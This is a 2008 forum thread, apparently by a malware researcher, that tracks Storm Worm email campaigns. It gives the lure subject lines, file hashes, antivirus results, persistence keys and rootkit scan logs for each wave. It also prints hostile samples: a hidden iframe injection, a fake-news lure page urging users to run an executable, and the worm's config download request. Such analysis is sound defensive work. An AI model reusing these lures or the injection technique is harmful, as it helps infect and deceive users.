Don't visit the pages, depending on the browser you are using, you will get one of the file names mentioned in the post header because they are serving up exploits. For Internet Explorer, Maxton (all IE based ones) they start of with an adobestream exploit followed by a heap overflow. Opera browser is based on an iframe exploit. There is no exploit visible when using Firefox but this does not mean that you are safe!

Kimberly

Apr 25 2008, 10:03 PM

<h4>

Recent publications

</h4>
LEET'08: Measurements and Mitigation of Peer-to-Peer-based Botnets: A Case Study on Storm Worm from honeyblog.

HTML version is available here.

Many thanks to Sabu75 for the link.

Kimberly

May 19 2008, 05:44 PM

Subject:

Here in my heart.

Body:

You are the ONE http://[removed]

______________________________

The webpage contains a script in order to resize your browser window. At the time of the write up, no exploits are present on the site.

CODE
<script>
self.resizeTo(120,250);
</script>

<h4>

loveyou.exe

</h4>
File size: 151041 bytes
MD5...: 85a6e87d4a7444fd0a96f1c5e15bb13e
SHA1..: 6a88b3d5d33f2727a9eb0f62992e207e4348c050
PEiD: -

QUOTE
File loveyou.exe received on 05.19.2008 18:46:23 (CET)
AntiVir 7.8.0.19 2008.05.19 TR/Dropper.Gen
Authentium 5.1.0.4 2008.05.18 -
Avast 4.8.1195.0 2008.05.18 -
AVG 7.5.0.516 2008.05.19 I-Worm/Nuwar.R
BitDefender 7.2 2008.05.19 Trojan.Peed.PJ
CAT-QuickHeal 9.50 2008.05.19 Win32.Email-Worm.Zhelatin.yu.4
ClamAV 0.92.1 2008.05.19 -
DrWeb 4.44.0.09170 2008.05.19 Trojan.Packed.460
eSafe 7.0.15.0 2008.05.19 Suspicious File
eTrust-Vet 31.4.5798 2008.05.16 -
Ewido 4.0 2008.05.19 -
F-Prot 4.4.2.54 2008.05.16 -
F-Secure 6.70.13260.0 2008.05.19 Email-Worm.Win32.Zhelatin.yu
Fortinet 3.14.0.0 2008.05.19 -
GData 2.0.7306.1023 2008.05.19 Email-Worm.Win32.Zhelatin.yu
Ikarus T3.1.1.26.0 2008.05.19 -
Kaspersky 7.0.0.125 2008.05.19 Email-Worm.Win32.Zhelatin.yu
McAfee 5297 2008.05.17 -
Microsoft 1.3408 2008.05.13 -
NOD32v2 3110 2008.05.19 -
Norman 5.80.02 2008.05.19 -
Panda 9.0.0.4 2008.05.19 -
Prevx1 V2 2008.05.19 -
Rising 20.45.02.00 2008.05.19 -
Sophos 4.29.0 2008.05.19 -
Sunbelt 3.0.1123.1 2008.05.17 -
Symantec 10 2008.05.19 -
TheHacker 6.2.92.313 2008.05.19 -
VBA32 3.12.6.6 2008.05.18 -
VirusBuster 4.3.26:9 2008.05.19 -
Webwasher-Gateway 6.6.2 2008.05.19 Trojan.Dropper.Gen

<h4>

Notes

</h4>
Copies itself as %windir%\herjek.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.

O4 - HKCU\..\Run: [herjek] C:\WINDOWS\herjek.exe

No hidden library in this version. The configuration file containing the peers is again named after the excutable; herjek.config; which is downloaded from the server with a special user agent.

GET /getbackup.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windoss NT 5.1; SV1921)
Host: cadeaux-avenue.cn

Kimberly

Jun 3 2008, 03:15 PM

Subject:

Deep in my heart.
Lucky to have you.
I wanna be with you.
For you sweetheart!
Only wanna be with you.
Nothing's Gonna Change My Love For You.
I belong to you.
Lost In Your Eyes

Body:

Wanna kiss you.
Crazy in love.
I'll Never Find Someone Like You.
Somebody loves you.
Lost In Your Eyes.
Here in my heart.
Love me tender, love me true.
Missing you.

<h4>

Detection

</h4>
File size: 140289 bytes
MD5...: c4abd43490160b4af89d68ab847abbef
SHA1..: 771b8ce326a88ea8fa9998c287a77c5a6878b2db

QUOTE
File loveyou.exe received on 06.03.2008 16:52:31 (CET)
AhnLab-V3 2008.5.30.1 2008.06.03 -
AntiVir 7.8.0.26 2008.06.03 Worm/Zhelatin.za
Authentium 5.1.0.4 2008.06.02 -
Avast 4.8.1195.0 2008.06.03 -
AVG 7.5.0.516 2008.06.03 I-Worm/Nuwar.T
BitDefender 7.2 2008.06.03 Trojan.Peed.PJ
CAT-QuickHeal 9.50 2008.06.03 (Suspicious) - DNAScan
ClamAV 0.92.1 2008.06.03 -
DrWeb 4.44.0.09170 2008.06.03 -
eSafe 7.0.15.0 2008.06.02 Suspicious File
eTrust-Vet 31.4.5845 2008.06.03 -
Ewido 4.0 2008.06.03 -
F-Prot 4.4.4.56 2008.06.02 -
F-Secure 6.70.13260.0 2008.06.03 Email-Worm.Win32.Zhelatin.zt
Fortinet 3.14.0.0 2008.06.03 -
GData 2.0.7306.1023 2008.06.03 Email-Worm.Win32.Zhelatin.zt
Ikarus T3.1.1.26.0 2008.06.03 -
Kaspersky 7.0.0.125 2008.06.03 Email-Worm.Win32.Zhelatin.zt
McAfee 5308 2008.06.02 -
Microsoft 1.3604 2008.06.03 Backdoor:Win32/Nuwar.gen!D
NOD32v2 3154 2008.06.03 a variant of Win32/Nuwar.CU
Norman 5.80.02 2008.06.03 -
Panda 9.0.0.4 2008.06.03 -
Prevx1 V2 2008.06.03 -
Rising 20.47.12.00 2008.06.03 -
Sophos 4.29.0 2008.06.03 -
Sunbelt 3.0.1143.1 2008.06.03 -
Symantec 10 2008.06.03 Trojan.Peacomm.D
TheHacker 6.2.92.332 2008.06.03 -
VBA32 3.12.6.7 2008.06.03 -
VirusBuster 4.3.26:9 2008.06.03 -
Webwasher-Gateway 6.6.2 2008.06.03 Worm.Zhelatin.za

<h4>

Notes

</h4>
Copies itself as %windir%\mahmud.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.

O4 - HKCU\..\Run: [mahmud] C:\WINDOWS\mahmud.exe

Same User Agent and domain as on May 19.

Other current file names.

O4 - HKCU\..\Run: [abass] C:\WINDOWS\abass.exe
O4 - HKCU\..\Run: [farkrish] C:\WINDOWS\farkrish.exe

Kimberly

Jun 19 2008, 01:44 PM

Subject:

The capital of China were collapsed by earthquake.
Death toll in China is growing.
A new deadly catastrophe in China.
Unprecedented earthquake in China.
Chinese people are horrified by new earthquake.
Terrible earthquake devastated Beijing.

Body:

Strongest earthquake hits Beijing.
The most powerful quake hits China.
Recent china earthquake kills million.
A new powerful disaster in China.
2008 Olympic Games are under the threat.
The massive disaster leveled the center of Beijing to the ground.

<h4>

Detection of Beijing.exe

</h4>
File size: 119296 bytes
MD5...: 0bca0670720897b55801e0e33127feb5
SHA1..: c1d707de123bc8fd4e48c2895c9976c30faefe31

QUOTE
File beijing.exe received on 06.19.2008 15:28:46 (CET)
AhnLab-V3 2008.6.19.0 2008.06.19 -
AntiVir 7.8.0.55 2008.06.19 Worm/Zhelatin.zc
Authentium 5.1.0.4 2008.06.18 -
Avast 4.8.1195.0 2008.06.18 Win32:TDrop
AVG 7.5.0.516 2008.06.19 -
BitDefender 7.2 2008.06.19 Trojan.Peed.JLV
CAT-QuickHeal 9.50 2008.06.18 -
ClamAV 0.93.1 2008.06.19 -
DrWeb 4.44.0.09170 2008.06.19 -
eSafe 7.0.15.0 2008.06.18 Suspicious File
eTrust-Vet 31.6.5887 2008.06.19 -
Ewido 4.0 2008.06.19 -
F-Prot 4.4.4.56 2008.06.18 -
F-Secure 6.70.13260.0 2008.06.19 -
Fortinet 3.14.0.0 2008.06.19 -
GData 2.0.7306.1023 2008.06.19 Win32:TDrop
Ikarus T3.1.1.26.0 2008.06.19 Email-Worm.Win32.Zhelatin.zy
Kaspersky 7.0.0.125 2008.06.19 -
McAfee 5320 2008.06.18 -
Microsoft 1.3604 2008.06.19 Backdoor:Win32/Nuwar.gen!D
NOD32v2 3200 2008.06.19 Win32/Nuwar
Norman 5.80.02 2008.06.17 -
Panda 9.0.0.4 2008.06.18 Suspicious file
Prevx1 V2 2008.06.19 -
Rising 20.49.32.00 2008.06.19 -
Sophos 4.30.0 2008.06.19 W32/Nuwar-E
Sunbelt 3.0.1153.1 2008.06.15 -
Symantec 10 2008.06.19 Trojan.Peacomm.D
TheHacker 6.2.92.354 2008.06.18 -
TrendMicro 8.700.0.1004 2008.06.19 -
VBA32 3.12.6.7 2008.06.19 -
VirusBuster 4.3.26:9 2008.06.12 -
Webwasher-Gateway 6.6.2 2008.06.19 Worm.Zhelatin.zc

<h4>

Notes

</h4>
Copies itself as %windir%\msvupdater.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.

O4 - HKCU\..\Run: [msvupdater] C:\WINDOWS\msvupdater.exe

Config file: msvupdater.config

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script as seen below. Which decodes to another obfuscated script. Once completely decoded, several exploits are visible.

CODE
<html>
<head>
<title>Strongest earthquake hits Beijing</title>
</head>
<body>
<table align="center" width="410" border=0>
<tr><td>A new powerful disaster just occurred in China. The most deadly, 9 magnitude, earthquake took away million of lives in the heart of China, Beijing. Rapidly growing panic paralyzed life of Chinese capital. 2008 Olympic Games are under the threat of failure. Click on the video to see the details of this terrible disaster and choose either "Open" or "Run".
<br><br><a href="beijing.exe"><img border=0 src="mov.gif"></a></td></tr>
<iframe src="ind.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
</table>
</body>
</html>

Note: Partial code due to its length.

Kimberly

Jun 20 2008, 05:02 PM

A bit more on the obfuscated code. The first part are the usual ones ....

______________________________

AOL SuperBuddy ActiveX.

http://www.symantec.com/avcenter/attack_sigs/s22269.html
______________________________

NCTAudioFile2

http://www.kb.cert.org/vuls/id/292713
______________________________

GomWebCtrl.GomManager.1

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5779
______________________________

RealPlayer

http://www.kb.cert.org/vuls/id/831457
______________________________

WebviewFolderIcon.WebviewFolderIcon.1

http://www.securiteam.com/exploits/6A0060AH5G.html
http://osvdb.org/27110
______________________________

BaiduBar

http://archives.neohapsis.com/archives/ful...07-08/0015.html

Kimberly

Jul 1 2008, 10:11 PM

Back to the love theme ... "sponsored" by 123greetings.com lol .... and a fake advert banner.

Subject:

You are the one.
Not the same without you.
Miss you with all my heart.
Deeply in love with you.

Body:

Lucky to have you.
You feel up my senses.
Nothing's Gonna Change My Love For You.
Deeply in love with you.
Can't stay away from you.

<h4>

Detection of mylove.exe / winner.exe

</h4>
File size: 119296 bytes
MD5...: a7376e394ca8885bdccfb052a01db18c
SHA1..: 2748928583db771c88c930b770a447d9fec6cb85
SHA256: 539459925b900a8666dd78eb4acf12c28e1f713bf96dc8633082b93ba278d51f
PEiD..: -

QUOTE
File mylove.exe received on 07.01.2008 06:26:46 (CET)
AhnLab-V3 2008.7.1.0 2008.07.01 -
AntiVir 7.8.0.59 2008.06.30 -
Authentium 5.1.0.4 2008.07.01 -
Avast 4.8.1195.0 2008.06.30 -
AVG 7.5.0.516 2008.06.30 -
BitDefender 7.2 2008.07.01 Trojan.Peed.JLV
CAT-QuickHeal 9.50 2008.06.30 -
ClamAV 0.93.1 2008.07.01 -
DrWeb 4.44.0.09170 2008.06.30 -
eSafe 7.0.17.0 2008.06.30 Suspicious File
eTrust-Vet 31.6.5916 2008.07.01 -
Ewido 4.0 2008.06.27 -
F-Prot 4.4.4.56 2008.07.01 -
F-Secure 7.60.13501.0 2008.06.26 -
Fortinet 3.14.0.0 2008.07.01 -
GData 2.0.7306.1023 2008.07.01 -
Ikarus T3.1.1.26.0 2008.07.01 Email-Worm.Win32.Zhelatin.zy
Kaspersky 7.0.0.125 2008.07.01 -
McAfee 5328 2008.06.30 -
Microsoft 1.3704 2008.07.01 -
NOD32v2 3229 2008.06.30 -
Norman 5.80.02 2008.06.30 -
Panda 9.0.0.4 2008.07.01 -
Prevx1 V2 2008.07.01 -
Rising 20.51.10.00 2008.07.01 -
Sophos 4.30.0 2008.07.01 -
Sunbelt 3.1.1509.1 2008.07.01 -
Symantec 10 2008.07.01 -
TheHacker 6.2.96.365 2008.07.01 -
TrendMicro 8.700.0.1004 2008.06.30 -
VBA32 3.12.6.8 2008.06.30 -
VirusBuster 4.5.11.0 2008.06.30 -
Webwasher-Gateway 6.6.2 2008.06.30 -

<h4>

Notes

</h4>
Copies itself as %windir%\msvecurity.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.

O4 - HKCU\..\Run: [msvecurity] C:\WINDOWS\msvecurity.exe

Config file: msvecurity.config

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20 th.

Kimberly

Jul 3 2008, 11:10 PM

<h4></h4>
Subject:

American Independence Day.
Celebrations have already begun.
Celebrate the spirit of America.
Stars and Strips forever.
Spectacular fireworks show.
Amazing Independence Day show.
Long Live America.
The best firework you've ever seen.

Body:

Long Live America.
Amazing Independence Day salute.
Bright and joyful Fourth of July.
America for You and Me.
Celebrating the spirit of our Country.
Time for Fireworks.
Celebrate Independence.
Proud to be an American.

<h4>

Detection of fireworks.exe

</h4>
File size: 118785 bytes
MD5...: d40826234a66bba2039c5b34967a92ec
SHA1..: 411bac4a0aacb0a4cc2320295bf3f9ac4a029f1e
SHA256: 1122c5bae6aeaee82682fd36c9338013abec118fe75abf91b7ea3594f0af0d7f
PEiD..: -

QUOTE
File fireworks.exe received on 07.04.2008 00:35:38 (CET)
AhnLab-V3 2008.7.4.0 2008.07.03 -
AntiVir 7.8.0.64 2008.07.03 WORM/Zhelatin.Gen
Authentium 5.1.0.4 2008.07.03 -
Avast 4.8.1195.0 2008.07.03 -
AVG 7.5.0.516 2008.07.03 I-Worm/Nuwar.U
BitDefender 7.2 2008.07.03 Trojan.Peed.JLV
CAT-QuickHeal 9.50 2008.07.03 Win32.Trojan-Downloader.Cntr.ca.3
ClamAV 0.93.1 2008.07.03 -
DrWeb 4.44.0.09170 2008.07.03 Trojan.Packed.555
eSafe 7.0.17.0 2008.07.03 Suspicious File
eTrust-Vet 31.6.5922 2008.07.02 -
Ewido 4.0 2008.07.03 -
F-Prot 4.4.4.56 2008.07.03 -
F-Secure 7.60.13501.0 2008.07.03 -
Fortinet 3.14.0.0 2008.07.04 -
GData 2.0.7306.1023 2008.07.03 Email-Worm.Win32.Zhelatin.add
Ikarus T3.1.1.26.0 2008.07.03 Email-Worm.Win32.Zhelatin.zy
Kaspersky 7.0.0.125 2008.07.03 Email-Worm.Win32.Zhelatin.add
McAfee 5331 2008.07.03 W32/Nuwar@MM
Microsoft 1.3704 2008.07.03 Backdoor:Win32/Nuwar.gen!D
NOD32v2 3239 2008.07.03 Win32/Nuwar.DC
Norman 5.80.02 2008.07.03 -
Panda 9.0.0.4 2008.07.03 Suspicious file
Prevx1 V2 2008.07.04 -
Rising 20.51.32.00 2008.07.03 -
Sophos 4.30.0 2008.07.03 Troj/Dorf-BP
Sunbelt 3.1.1509.1 2008.07.03 -
Symantec 10 2008.07.03 Trojan.Peacomm.D
TheHacker 6.2.96.370 2008.07.04 -
TrendMicro 8.700.0.1004 2008.07.03 -
VBA32 3.12.6.8 2008.07.03 -
VirusBuster 4.5.11.0 2008.07.03 Trojan.Tibs.AMZ
Webwasher-Gateway 6.6.2 2008.07.03 Worm.Zhelatin.Gen

<h4>

Notes

</h4>
Copies itself as %windir%\msserv.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.

O4 - HKCU\..\Run: [msserv] C:\WINDOWS\msserv.exe

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20 th.

Kimberly

Jul 8 2008, 11:38 PM

Jumping to World War III subjects after Independence Day ... logical nah ?

Subject:

The World War III has already begun.
War between USA&Iran.

Body:

The World War III has already begun.
More than 10000 Iranians were murdered.
US Army crossed Iran's borders.
War between USA&Iran.

<h4>

Detection of iran_occupation.exe

</h4>
File size: 118273 bytes
MD5...: d3547e067aff8bb2e3c250d9c541ea78
SHA1..: da99d4061e078c35a26459db3971eb8ba6600277
SHA256: 3e9135f33980783bf8e10faa339f9cfd84f4fb074c659b0883918bc4bf66e56f
PEiD..: -

QUOTE
File iran_occupation.exe received on 07.09.2008 00:58:56 (CET)Antivirus Version Last Update Result
AhnLab-V3 2008.7.9.0 2008.07.08 -
AntiVir 7.8.0.64 2008.07.08 -
Authentium 5.1.0.4 2008.07.08 -
Avast 4.8.1195.0 2008.07.08 -
AVG 7.5.0.516 2008.07.08 I-Worm/Nuwar.U
BitDefender 7.2 2008.07.08 Dropped:Trojan.Peed.PM
CAT-QuickHeal 9.50 2008.07.08 -
ClamAV 0.93.1 2008.07.08 -
DrWeb 4.44.0.09170 2008.07.08 -
eSafe 7.0.17.0 2008.07.08 Suspicious File
eTrust-Vet 31.6.5937 2008.07.08 -
Ewido 4.0 2008.07.08 -
F-Prot 4.4.4.56 2008.07.08 -
F-Secure 7.60.13501.0 2008.07.08 -
Fortinet 3.14.0.0 2008.07.08 -
GData 2.0.7306.1023 2008.07.08 -
Ikarus T3.1.1.26.0 2008.07.08 -
Kaspersky 7.0.0.125 2008.07.09 -
McAfee 5334 2008.07.08 -
Microsoft 1.3704 2008.07.09 -
NOD32v2 3252 2008.07.08 -
Norman 5.80.02 2008.07.08 -
Panda 9.0.0.4 2008.07.08 Suspicious file
Prevx1 V2 2008.07.09 -
Rising 20.52.12.00 2008.07.08 -
Sophos 4.31.0 2008.07.08 -
Sunbelt 3.1.1509.1 2008.07.04 -
Symantec 10 2008.07.09 -
TheHacker 6.2.96.374 2008.07.07 -
TrendMicro 8.700.0.1004 2008.07.08 -
VBA32 3.12.6.8 2008.07.08 -
VirusBuster 4.5.11.0 2008.07.08 -
Webwasher-Gateway 6.6.2 2008.07.08 -

<h4>

Notes

</h4>
Copies itself as %windir%\msserv.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.

O4 - HKCU\..\Run: [msserv] C:\WINDOWS\msserv.exe

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20 th.

CODE
<iframe src="ind.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

If the exploits don't trigger anything, a click on the link will download iran_occupation.exe, a click on the "advertisement banner" will download form.exe.

Kimberly

Jul 21 2008, 10:12 PM

<h4>

Back to the rootkits

</h4>

Subject:

Death of the U.S Dollar.
Bye bye dollar, hello amero.
Amero currency Union is now the reality.

Body:

The Amero is here.
Amero - the secret currency.
Death of the U.S. Dollar.

<h4>

Detection of amero.exe

</h4>
File size: 90625 bytes
MD5...: 615f14de3233f7746a8c88acd7295709
SHA1..: a6819c61c0089ba6aec81a6c63b5734be2bc2786
SHA256: 7d942808c48f6e032de4d80f18b98398c1f2cd61ea01c979e699e60472110e59
PEiD..: -

QUOTE
File amero.exe received on 07.21.2008 22:39:16 (CET)
AhnLab-V3 2008.7.21.1 2008.07.21 -
AntiVir 7.8.1.11 2008.07.21 HEUR/Crypted
Authentium 5.1.0.4 2008.07.21 -
Avast 4.8.1195.0 2008.07.21 -
AVG 8.0.0.130 2008.07.21 I-Worm/Nuwar.N
BitDefender 7.2 2008.07.21 Dropped:Rootkit.Agent.AITJ
CAT-QuickHeal 9.50 2008.07.21 -
ClamAV 0.93.1 2008.07.21 -
DrWeb 4.44.0.09170 2008.07.21 -
eSafe 7.0.17.0 2008.07.21 Suspicious File
eTrust-Vet 31.6.5971 2008.07.21 -
Ewido 4.0 2008.07.21 -
F-Prot 4.4.4.56 2008.07.21 -
F-Secure 7.60.13501.0 2008.07.21 Email-Worm.Win32.Zhelatin.aep
Fortinet 3.14.0.0 2008.07.21 -
GData 2.0.7306.1023 2008.07.21 Email-Worm.Win32.Zhelatin.aep
Ikarus T3.1.1.34.0 2008.07.21 -
Kaspersky 7.0.0.125 2008.07.21 Email-Worm.Win32.Zhelatin.aep
McAfee 5343 2008.07.21 W32/Nuwar@MM
Microsoft 1.3704 2008.07.21 -
NOD32v2 3284 2008.07.21 -
Norman 5.80.02 2008.07.21 -
Panda 9.0.0.4 2008.07.21 Suspicious file
PCTools 4.4.2.0 2008.07.21 -
Prevx1 V2 2008.07.21 -
Rising 20.54.02.00 2008.07.21 -
Sophos 4.31.0 2008.07.21 Mal/TibsPak
Sunbelt 3.1.1536.1 2008.07.18 -
Symantec 10 2008.07.21 Trojan.Peacomm.D
TheHacker 6.2.96.385 2008.07.20 -
TrendMicro 8.700.0.1004 2008.07.21 -
VBA32 3.12.8.1 2008.07.21 -
VirusBuster 4.5.11.0 2008.07.21 -
Webwasher-Gateway 6.6.2 2008.07.21 Heuristic.Crypted

<h4>

Detection of glok+****-****.sys

</h4>
File size: 127104 bytes
MD5...: f91cc9c4c506d195ef5a9d35fecc71a7
SHA1..: cc97310ef67afd4ad4041159556b90e252e6cfa1
SHA256: 35add3ab60b411be1d2bf14121b2d15819c8e6af365704aa1c5387ac324fdf1d
PEiD..: -

QUOTE
File glok_de7-6d2d.sys received on 07.21.2008 23:19:40 (CET)
AhnLab-V3 2008.7.21.1 2008.07.21 -
AntiVir 7.8.1.11 2008.07.21 TR/Rootkit.Gen
Authentium 5.1.0.4 2008.07.21 W32/Dropper.gen6
Avast 4.8.1195.0 2008.07.21 Win32:Zhelatin-CEC
AVG 8.0.0.130 2008.07.21 I-Worm/Nuwar.N
BitDefender 7.2 2008.07.21 Rootkit.Agent.AITJ
CAT-QuickHeal 9.50 2008.07.21 I-Worm.Zhelatin.aec
ClamAV 0.93.1 2008.07.21 -
DrWeb 4.44.0.09170 2008.07.21 Trojan.MulDrop.17826
eSafe 7.0.17.0 2008.07.21 -
eTrust-Vet 31.6.5971 2008.07.21 Win32/Sintun!generic
Ewido 4.0 2008.07.21 -
F-Prot 4.4.4.56 2008.07.21 W32/Dropper.gen6
F-Secure 7.60.13501.0 2008.07.21 Email-Worm.Win32.Zhelatin.aec
Fortinet 3.14.0.0 2008.07.21 W32/Dorf.AEC@mm
GData 2.0.7306.1023 2008.07.21 Email-Worm.Win32.Zhelatin.aec
Ikarus T3.1.1.34.0 2008.07.21 Email-Worm.Win32.Zhelatin.aec
Kaspersky 7.0.0.125 2008.07.21 -
McAfee 5343 2008.07.21 Downloader-BAI.sys.gen.a
Microsoft 1.3704 2008.07.21 Backdoor:WinNT/Nuwar.B!sys
NOD32v2 3284 2008.07.21 -
Norman 5.80.02 2008.07.21 W32/DLoader.IMPC
Panda 9.0.0.4 2008.07.21 -
PCTools 4.4.2.0 2008.07.21 Rootkit.QQHelp.Gen.6
Prevx1 V2 2008.07.21 -
Rising 20.54.02.00 2008.07.21 -
Sophos 4.31.0 2008.07.21 Troj/Dorf-Fam
Sunbelt 3.1.1536.1 2008.07.18 -
Symantec 10 2008.07.21 Trojan.Peacomm.D
TheHacker 6.2.96.385 2008.07.20 -
TrendMicro 8.700.0.1004 2008.07.21 -
VBA32 3.12.8.1 2008.07.21 -
VirusBuster 4.5.11.0 2008.07.21 Rootkit.QQHelp.Gen.6
Webwasher-Gateway 6.6.2 2008.07.21 Trojan.Rootkit.Gen

<h4>

Notes

</h4>

Modifies the settings related to the synchronization of Internet Time.
Installation of a kernel-mode driver again (rootkit). The service and the sys file are partially random: glok+[random 3 or 4 letters / numbers]-[random 3 or 4 letters / numbers]
A new memory page was created in the address space of %System%\services.exe
Request of inbound & outbound connections if your firewall intercepts them.
Config File: glok+serv.config

Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

Visible signs.

None.

Rootkit scan.

Clean PC.

QUOTE
---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)

Rootkit installed.

QUOTE
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-07-21 22:55:27
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\glok+de7-6d2d.sys ZwEnumerateKey [0xF42CF930]
SSDT \??\C:\WINDOWS\glok+de7-6d2d.sys ZwEnumerateValueKey [0xF42CFAAE]
SSDT \??\C:\WINDOWS\glok+de7-6d2d.sys ZwQueryDirectoryFile [0xF42CF5E6]

---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip glok+de7-6d2d.sys
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp glok+de7-6d2d.sys
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp glok+de7-6d2d.sys
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp glok+de7-6d2d.sys

Device \Driver\SYMTDI \Device\SymTDI glok+de7-6d2d.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\glok+de7-6d2d.sys (*** hidden *** ) [AUTO] glok+de7-6d2d

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@ImagePath \??\C:\WINDOWS\glok+de7-6d2d.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@DisplayName glok+de7-6d2d
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\glok+de7-6d2d.sys 127104 bytes
File C:\WINDOWS\glok+serv.config 47522 bytes

---- EOF - GMER 1.0.14 ----

SymTDI is the Norton Internet Security filter, the driver has been replaced by the rootkit.

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20 th.

CODE
<iframe src="ind.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

If the exploits don't trigger anything, a click on the picture will download amero.exe.

Kimberly

Jul 24 2008, 07:06 PM

<h4>

Love theme

</h4>
After ID4, World War 3 & the Amero why not get back to a more classical theme ... Love.

Subject:

Crazy in love.
Fallen for you.

Body:

I give my heart to you.
I Wanna Be With You.

<h4>

Detection of postcard.exe

</h4>
File size: 91137 bytes
MD5...: 1102166b2383733e3088763933a0266a
SHA1..: d60d00ac2488898e0a558ab9e1843f16c7428eca
SHA256: 752f81d5dc91232a2c163082e000607483dfc5e1e0c784e6f929d65b8022a2f2
PEiD..: -

QUOTE
File postcard.exe received on 07.24.2008 20:43:18 (CET)
AhnLab-V3 2008.7.25.0 2008.07.24 -
AntiVir 7.8.1.12 2008.07.24 -
Authentium 5.1.0.4 2008.07.24 -
Avast 4.8.1195.0 2008.07.24 -
AVG 8.0.0.130 2008.07.24 I-Worm/Nuwar.V
BitDefender 7.2 2008.07.24 Trojan.Peed.JPS
CAT-QuickHeal 9.50 2008.07.24 -
ClamAV 0.93.1 2008.07.24 -
DrWeb 4.44.0.09170 2008.07.24 -
eSafe 7.0.17.0 2008.07.24 Suspicious File
eTrust-Vet 31.6.5979 2008.07.24 -
Ewido 4.0 2008.07.24 -
F-Prot 4.4.4.56 2008.07.24 -
F-Secure 7.60.13501.0 2008.07.24 Packed.Win32.Tibs.kg
Fortinet 3.14.0.0 2008.07.24 -
GData 2.0.7306.1023 2008.07.24 Packed.Win32.Tibs.kg
Ikarus T3.1.1.34.0 2008.07.24 -
Kaspersky 7.0.0.125 2008.07.24 Packed.Win32.Tibs.kg
McAfee 5346 2008.07.24 -
Microsoft 1.3704 2008.07.24 -
NOD32v2 3296 2008.07.24 a variant of Win32/Nuwar.DF
Norman 5.80.02 2008.07.24 -
